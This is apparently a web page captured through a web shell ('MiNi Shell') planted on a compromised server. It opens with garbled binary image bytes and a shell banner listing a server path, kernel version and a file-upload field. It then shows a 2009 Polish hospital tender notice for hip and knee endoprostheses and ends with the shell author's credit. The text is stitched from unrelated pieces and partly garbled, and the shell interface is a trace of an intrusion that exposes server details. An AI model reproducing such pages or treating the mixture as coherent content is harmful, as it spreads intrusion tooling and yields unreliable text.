JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091022/185197-N-2009.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Dostawy endoprotez stawu biodrowego i kolanowego</b><br>
<b>Numer ogłoszenia: 185197 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tomaszowskie Centrum Zdrowia sp. z o.o. , ul. Jana Pawła II 35, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 044 7257235, faks 044 7257235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum.tomaszow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka z ograniczoną odpowiedzialnoscią.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy endoprotez stawu biodrowego i kolanowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy endoprotez stawu biodrowego i kolanowego dla potrzeb Oddziału Chirurgii Urazowo-Ortopedycznej.
Szczegółowy opis asortymentu i ilości zawarty jest w formularzu cenowym stanowiącym załącznik nr 2 do specyfikacji. Szacunkowe ilości podane w formularzu cenowym dotyczą okresu 12 miesięcy. 
Przedmiot zamówienia podzielono na 12 pakietów. 
Wykonawca jest zobowiązany do złożenia depozytu w formie setu. ( dotyczy Pakietu nr 3,  5, 7, 11, 12 ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości zsumowanej dla oferowanych pakietów: 
Nazwa pakietu	Wadium [PLN]
Pakiet nr 1.  Implanty do kapoplastyki całkowitej stawu biodrowego	420,00
Pakiet nr 2. Endoproteza bezcementowa przynasadowa stawu biodrowego; złożona z krótkiego trzpienia, głowy metalowej, panewki tytanowej Press-fit i wkładu polietylenowego	530,00
Pakiet nr 3. Endoproteza pierwotna bezcementowa stawu biodrowego, składająca się z trzpienia głowy metalowej, panewki tytanowej i wkładu polietylenowego	3 090,00
Pakiet nr 4. Endoproteza rewizyjna stawu biodrowego	370,00
Pakiet nr 5. Endoproteza bipolarna stawu biodrowego	650,00
Pakiet nr 6.  Endoproteza pierwotna cementowa stawu biodrowego (trzpień głowa panewka)	500,00
Pakiet nr 7.  Endoproteza częściowa typu Austin-Moore	200,00
Pakiet nr 8.  Endoproteza pierwotna cementowa i bezcementowa stawu kolanowego	570,00
Pakiet nr 9.  Endoproteza rewizyjna stawu kolanowego	620,00
Pakiet nr 10.  Endoproteza jednoprzedziałowa (boczna/przyśrodkowa) stawu kolanowego	210,00
Pakiet nr 11.  System ciśnieniowego płukania jamy szpikowej i panewki.	200,00
Pakiet nr 12.  System próżniowego przygotowania i podawania cementu.	1050,00
LUB  ŁĄCZNIE:	
 8 410,00 zł 
 2.	Zabezpieczenie musi być wniesione w odpowiednim terminie, tj. takim,          aby Zamawiający mógł sprawdzić, czy oferta została zabezpieczona wadium najpóźniej na moment otwarcia ofert.
3.	Z dokumentu potwierdzającego wniesienie wadium, bądź dokumentu towarzyszącemu (najlepiej trwale złączonemu) musi wynikać, za jakie Pakiety zostało wniesione wadium.
4.	Wadium może być wniesione w następujących formach: 
-	pieniądzu   przelewem na konto Numer 83 1020 3916 0000 0002 0139 3602
Uwaga! 
Pieniądze muszą znajdować się na koncie Zamawiającego najpóźniej na moment otwarcia ofert  z zaznaczeniem  wadium ZP/24/Sp./09  - Dostawa endoprotez stawu  biodrowego i kolanowego                  
  -     kserokopia dokumentu musi być potwierdzona za zgodność z oryginałem i dołączona do 
        oferty. 
-	w poręczeniach bankowych w postaci oryginału dokumentu lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (poręczenie kasy jest zawsze poręczeniem pieniężnym).
-	gwarancjach bankowych (w postaci oryginałów dokumentów)
-	gwarancjach ubezpieczeniowych (w postaci oryginałów dokumentów)
-	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) (w postaci oryginałów dokumentów).
        Gwarant lub poręczyciel musi umożliwić Zamawiającemu wypłacenie wadium na każde wezwanie w przypadku naruszenia art. 46 ust. 4a i 5 ustawy Pzp. 
        W przypadku, gdy Wykonawca będzie żądał zwrotu oryginałów dokumentów, należy dodatkowo  do oferty dołączyć kserokopię oryginału, a oryginał umieścić w zaadresowanej kopercie i dołączyć  do oferty w sposób umożliwiający łatwe jej wyjęcie.
Zasady zwrotu i zatrzymania wadium (art. 46 ustawy Pzp):
1.	Zamawiający zwraca niezwłocznie wadium, jeżeli: 
1) upłynął termin związania ofertą; 
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; 
3) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. 
2. Z zastrzeżeniem pkt. 4a, Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy: 
1)	który wycofał ofertę przed upływem terminu składania ofert; 
2)	który został wykluczony z postępowania; 
3)	którego oferta została odrzucona. 
3. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie powyższego pkt. 2 ppkt. 2 i 3 SIWZ, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego. 
4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
4a. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:
1.  Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych.
    -  posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień,
      -  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią      pisemne zobowiązanie innych  podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia,
    -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
    -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
2.  W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia,    Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o      udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w      sprawie zamówienia publicznego.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty.
Zamawiający odrzuca ofertę Wykonawcy:
-  gdy jest ona niezgodna z ustawą,
-  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, a w    szczególności 
    nie spełnia wszystkich wymogów - przedmiotu zamówienia,
-  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
-  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
-  wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
-  zawiera błędy w obliczeniu ceny,
- wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na    poprawienie 
  omyłki, o której mowa w art. 87 ust. 2 pkt 3,
-  nieważnej na podstawie odrębnych przepisów.
Warunki dodatkowe:
termin płatności 30 dni,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz Oferty wg załącznika nr 1.
2.	Wypełniony Przedmiot zamówienia - wg załącznika nr 2. Zamawiający prosi o dołączenie dodatkowo do oferty wypełniony załącznik nr 2 w formie elektronicznej (na dyskietce, płycie CD)
3.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 prawa zamówień publicznych   załącznik nr 3.1
4.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. 1 i  2 prawa zamówień publicznych - załączniki nr 3.2
5.	Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1:
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie      do  ewidencji  działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu    do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.2  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS u lub KRUS-u potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5, składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, odpowiednio że: 
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
       b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego  organu,
       c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
7.	Dokumenty, o których mowa w pkt 6a i pkt 6c powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 6b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,  administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
9.	 W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie dla wspólnego pełnomocnika.
10.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie musi by w formie oryginału lub notarialnie poświadczonej kopii.
11.	Foldery, ulotki, katalogi w języku polskim (lub przetłumaczone na język polski) dotyczące oferowanego asortymentu i potwierdzające wymagane parametry przez Zamawiającego. Zamawiający dopuszcza foldery, ulotki i katalogi również w języku angielskim pod warunkiem złożenia oświadczenia Wykonawcy, że w razie wezwania Zamawiającego dostarczy tłumaczenie na język polski wymaganej pozycji w wyznaczonym we wniosku terminie - dotyczy wszystkich pozycji.
12. Dokumenty potwierdzające, iż oferowany przedmiot zamówienia jest dopuszczony do stosowania w placówkach służby zdrowia stosownie do zapisów Ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93 poz. 896), - kserokopia potwierdzona za zgodność z oryginałem ze wskazaniem, której pozycji w pakiecie dotyczy.
13. Wykaz wykonanych dostaw (minimum 4), a w przypadku świadczeń  okresowych lub  ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem  wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością przedmiotowi  zamówienia. Forma wykazu wg załącznika nr 5 do SIWZ. Do wykazu należy dołączyć, minimum 3 dokumenty  (od różnych Odbiorców) potwierdzające, że te dostawy zostały wykonane należycie  (referencje). 
14.  Zamawiający żąda wskazania przez Wykonawcę w ofercie części Zamówienia, której wykonanie powierzy podwykonawcom. Zamawiający bezwzględnie żąda spełnienia - pod   rygorem  odrzucenia oferty - tego wymogu poprzez  wypełnienie punktu nr 7 w formularzu  oferty.
 15. Dowód wniesienia wadium wraz z wyszczególnieniem wpłat w powiązaniu z Pakietem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum.tomaszow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tomaszowskie Centrum Zdrowia sp. z o.o.w Tomaszowie Mazowieckim ul. Jana Pawła II 35 , Zamówienia Publiczne.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 10:00, miejsce: Tomaszowskie Centrum Zdrowia sp. z o.o.w Tomaszowie Mazowieckim ul. Jana Pawła II 35 , Sekretariat Szpitala.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Implanty do kapoplastyki całkowitej stawu biodrowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza bezcementowa przynasadowa stawu biodrowego; złożona z krótkiego trzpienia, głowy metalowej, panewki tytanowej Press-fit i wkładu polietylenowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza pierwotna bezcementowa stawu biodrowego, składająca się z trzpienia głowy metalowej, panewki tytanowej i wkładu polietylenowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza rewizyjna stawu biodrowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza bipolarna stawu biodrowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza pierwotna cementowa stawu biodrowego (trzpień głowa panewka).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza częściowa typu Austin-Moore.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza pierwotna cementowa i bezcementowa stawu kolanowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza rewizyjna stawu kolanowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoproteza jednoprzedziałowa (boczna/przyśrodkowa) stawu kolanowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System ciśnieniowego płukania jamy szpikowej i panewki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System próżniowego przygotowania i podawania cementu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com